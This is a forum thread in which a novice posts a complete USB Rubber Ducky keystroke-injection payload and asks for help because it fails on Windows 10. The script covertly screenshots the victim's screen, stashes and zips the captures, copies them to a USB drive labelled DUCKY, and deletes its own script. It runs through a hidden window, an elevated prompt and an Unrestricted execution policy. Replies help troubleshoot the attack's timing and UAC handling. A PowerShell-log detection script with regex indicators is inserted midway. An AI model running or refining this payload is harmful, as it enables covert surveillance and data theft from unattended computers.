"Take screen captures" Payload not work


trib

Hello everyone,

I am a newbie and not an IT expert. I just know the basics of coding. I have had my USB for 3 months, but I only successfully flashed it using Windows 2 days ago, since it's quite complicated for me. Currently my USB Ducky is using the Twin Duck 2.1 firmware and it was tested on the Windows 10 OS. It can execute the simple "Hello World" payload, but it can't execute the "Take screen captures" payload.

I encoded using the Online Encoder website (http://ducktoolkit-411.rhcloud.com/Home.jsp). The reporting method was copying to my USB drive. DUCKY is the name that I filled in in the next step. (Do I need to format it in lowercase as suggested?)

Here is the script:

DELAY 1050

GUI r
DELAY 1050
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1050
ALT y
DELAY 1050
ENTER
ALT SPACE
DELAY 1050
STRING m
DELAY 1050
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory
ENTER
STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth
ENTER
STRING $displayWidth = $displayInfo.ScreenWidth
ENTER
STRING $displayHeight = $displayInfo.ScreenHeight
ENTER
STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
ENTER
STRING $x = 0
ENTER
STRING do { Start-Sleep -Seconds 60
ENTER
STRING $jpegName = (get-date).ToString('HHmmss')
ENTER
STRING $image = new-object System.Drawing.Bitmap 1366 ,768
ENTER
STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight
ENTER
STRING $screen = [system.Drawing.Graphics]::FromImage($image)
ENTER
STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy))
ENTER
STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));
ENTER
STRING $x++ } while ($x -ne 2);
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name
ENTER
STRING move-item c:\Windows\Report.zip $driveLetter.Name
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 1050
STRING C:\Windows\config-156e3.ps1
ENTER
DELAY 1050
ALT F4
DELAY 1050
GUI r
DELAY 1050
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1050
ALT y
DELAY 1050
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 1050
STRING m
DELAY 1050
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1050
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

I increased the delay time and also executed the script myself to debug. I found something that I think may be the issue.

- I found that the "ALT y" command on the 7th line did not make any change when I executed it. Neither did the one on the 172nd line. Not to mention that it was combined with the command "STRING mode con:cols=14 lines=1" and turned into "ymode", and then the error was "ymode is not recognized as an internal or external command, operable program or batch file". So I erased it.

- After erasing the "ALT y" command, it makes an error. The USB executed that script with this warning: "the screen cannot be set to the number of lines and columns specified".

I think I'm currently stuck here. I don't understand what this command means. Can anyone help me solve this?

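From the defender's side, the script posted above leaves a recognisable trail in PowerShell script block logging (Event ID 4104): an execution-policy change to Unrestricted, a hidden-window `-File` launch from C:\Windows, System.Drawing screen capture, polling Win32_Volume for a drive labelled DUCKY, and the script deleting itself. The following Python is an added example that is not part of this thread or of the Duck Toolkit; it assumes script block logging is enabled and that events have already been flattened into constructed `eventid|user|ScriptBlockText` lines (the indicator weights and alert threshold are my own assumptions, not a standard).

```python
import re

# Indicator table derived from the payload quoted in the post above.
# Weights are an assumed rough ranking of how unusual each behaviour is
# in a normal interactive session; tune them for your own environment.
INDICATORS = [
    ("exec_policy_unrestricted",
     re.compile(r"Set-ExecutionPolicy\s+'?Unrestricted'?", re.I), 2),
    ("hidden_window_script",
     re.compile(r"-windowstyle\s+hidden\b.*-File\b", re.I), 2),
    ("screen_capture_api",
     re.compile(r"CopyFromScreen|System\.Drawing\.Bitmap", re.I), 3),
    ("removable_volume_poll",
     re.compile(r"Win32_Volume.*\.Label\s+-eq", re.I), 2),
    ("script_self_delete",
     re.compile(r"Remove-Item\s+\$MyInvocation\.InvocationName", re.I), 3),
    ("writes_under_windows_dir",
     re.compile(r"C:\\Windows\\\S+\.(?:ps1|zip)", re.I), 1),
]
THRESHOLD = 5  # assumed alert threshold on the summed weights


def score_script_block(text):
    """Return the indicators matched by one script block and their summed weight."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"score": score, "indicators": hits, "suspicious": score >= THRESHOLD}


def parse_line(line):
    """Parse one constructed 'eventid|user|ScriptBlockText' log line.

    maxsplit=2 keeps any '|' inside the script text (PowerShell pipes) intact.
    """
    event_id, user, text = line.split("|", 2)
    return int(event_id), user, text


def analyze_log(lines):
    """Aggregate indicator hits per user across all 4104 script block events.

    The payload is typed in several separate blocks, so a single block may
    score low; correlating by user is what makes the pattern stand out.
    """
    per_user = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event_id, user, text = parse_line(line)
        if event_id != 4104:  # only script block logging events
            continue
        entry = per_user.setdefault(user, {"score": 0, "indicators": []})
        for name in score_script_block(text)["indicators"]:
            if name not in entry["indicators"]:
                entry["indicators"].append(name)
        entry["score"] = sum(w for name, _, w in INDICATORS
                             if name in entry["indicators"])
        entry["suspicious"] = entry["score"] >= THRESHOLD
    return per_user


# Constructed sample log: one benign user and one user whose blocks mirror
# the thread's payload. These are made-up lines, not real captured events.
SAMPLE_LOG = [
    "4104|DESKTOP-1\\bob|Get-ChildItem -Path C:\\Users\\bob\\Documents",
    "4104|DESKTOP-1\\alice|powershell Set-ExecutionPolicy 'Unrestricted' "
    "-Scope CurrentUser -Confirm:$false",
    "4104|DESKTOP-1\\alice|powershell.exe -windowstyle hidden -File C:\\Windows\\config.ps1",
    "4104|DESKTOP-1\\alice|$screen.CopyFromScreen(0,0,0,0,$imageSize); "
    "$present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' }; "
    "Remove-Item $MyInvocation.InvocationName",
    "4103|DESKTOP-1\\alice|Get-Date",  # not a script block event, ignored
]

if __name__ == "__main__":
    for user, result in analyze_log(SAMPLE_LOG).items():
        flag = "ALERT" if result["suspicious"] else "ok"
        print(f"{flag:5} {user}: score={result['score']} {result['indicators']}")
```

The per-user aggregation matters because the payload arrives as many short keystroke-typed blocks: the execution-policy change alone is common enough in admin sessions that it should not page anyone, but combined with screen capture, removable-volume polling and self-deletion from the same account within a short window it is a strong signal.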

The ALT Y command is used when a modal dialog appears and you want to select a button with a shortcut with the letter Y. In this case, the script is trying to select the "Yes" option. That order only works on Windows with English as the primary language (for example, in Spanish the combination is "ALT S").

To avoid language dependence, I recommend you use "LEFTARROW+ENTER", assuming any admin order has the option "No" preselected, on a scheme where the order is "YES - NO".

Before going on, I suggest you understand the script, trying to reproduce it line by line. There is no sense in sending a payload that you don't understand (i.e., if you have a disk partition, why do you need to create a file when you can simply execute from the ducky drive?)


The ALT Y command is used when a modal dialog appears and you want to select a button with a shortcut with the letter Y. In this case, the script is trying to select the "Yes" option. That order only works on Windows with English as the primary language (for example, in Spanish the combination is "ALT S").

To avoid language dependence, I recommend you use "LEFTARROW+ENTER", assuming any admin order has the option "No" preselected, on a scheme where the order is "YES - NO".

Before going on, I suggest you understand the script, trying to reproduce it line by line. There is no sense in sending a payload that you don't understand (i.e., if you have a disk partition, why do you need to create a file when you can simply execute from the ducky drive?)

Thank you for your reply.

I do understand the script, since I read the Ducky script carefully. I also executed every line in the script myself, not with the USB. I found that every step was executed smoothly; it just got stuck at the command STRING mode con:cols=14 lines=1 after saving the notepad file (config-156e3.ps1) into C:\. I understand the Ducky script, but I admit that I'm not so familiar with CMD commands. All I know about those CMD commands is: create a notepad file > save to C:\ > then execute it with CMD. I will try to learn CMD commands later. Now I'm just trying to understand what the error is here, and I think it's because of a wrong Ducky script.


I've tested those commands on Win7: opening an admin command prompt with PowerShell, resizing (the mode string), selecting "move" and moving down with the down arrow key, and it works like a charm.

Maybe the prior commands are the trouble in the full sequence. Are you sure the sequence is executed correctly? That is, is it really saving (Control+S), typing the filename (C:\...) and closing the file (ALT+F4) before opening the command prompt? For example, if the save dialog is not showing in time (1.05 secs in your case), the rest of the commands are pointless.

Anyway, if you "move down" the cmd window, the resize function is not necessary ;)


I've tested those commands on Win7: opening an admin command prompt with PowerShell, resizing (the mode string), selecting "move" and moving down with the down arrow key, and it works like a charm.
Maybe the prior commands are the trouble in the full sequence. Are you sure the sequence is executed correctly? That is, is it really saving (Control+S), typing the filename (C:\...) and closing the file (ALT+F4) before opening the command prompt? For example, if the save dialog is not showing in time (1.05 secs in your case), the rest of the commands are pointless.
Anyway, if you "move down" the cmd window, the resize function is not necessary ;)

Yes, it did save a notepad file named config-xxx into C:\Windows. Everything seems to be OK until the script executes the command "mode con:cols=14 lines=1". So I guess the problem must be in the prior commands, as you said. So what should I do now? :(
